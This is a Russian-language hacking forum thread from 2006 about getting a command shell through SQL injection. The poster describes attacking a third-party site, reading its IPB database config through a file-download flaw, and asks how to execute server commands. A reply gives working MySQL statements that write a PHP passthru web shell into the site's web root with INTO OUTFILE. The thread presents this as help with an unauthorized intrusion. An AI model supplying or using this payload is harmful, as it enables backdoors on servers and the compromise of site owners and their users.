Шелл через SQL

Discussion in 'Уязвимости' started by Utochka, 6 Apr 2006.

Thread Status:
Not open for further replies.
  1. Utochka

    Utochka Elder - Старейшина

    Joined:
    21 Dec 2005
    Messages:
    495
    Likes Received:
    106
    Reputations:
    54
    Значит нашел сайт с sql инъекцией, составил запрос ошибок не возникает, но результат в браузер не выводиться. В чем тут может быть проблема?

    Еще есть возможность скачивать ЛЮБЫЕ файлы с сервака с помощью кривого скрипта!!!! Скачать значит файл с настройками базы от форума IPB.

    Скачал скрипт - rst.void.ru/download/sql.rar для коннекта к базе! Он успешно подсоединяеться, но опять же в браузере пусто!! ((

    Помогите советом!
     
  2. Utochka

    Utochka Elder - Старейшина

    Joined:
    21 Dec 2005
    Messages:
    495
    Likes Received:
    106
    Reputations:
    54
    Вот ща еще мысль пришла! Как выполнить команду на сервере (допустим ls -al) посредством sql инъекции и возможно это вообще?
     
  3. asm33

    asm33 Elder - Старейшина

    Joined:
    19 Jan 2006
    Messages:
    55
    Likes Received:
    7
    Reputations:
    4
    так вроде бы KEZ видео делал. Выполнение команд посредством sql инъекции
     
  4. m0nzt3r

    m0nzt3r моня

    Joined:
    22 Jun 2004
    Messages:
    2,096
    Likes Received:
    673
    Reputations:
    591
    Для этого есть поиск.Вот код:
    Code:
    CREATE TABLE `shell` (s TEXT);
    INSERT INTO `shell` values ('<? passthru("$cmd"); ?>');
    SELECT `s` INTO OUTFILE '/полный/путь/к/сайту/шелл.php' FROM `shell`;
    DROP TABLE `shell`;
    
    Закрыта.
     
Thread Status:
Not open for further replies.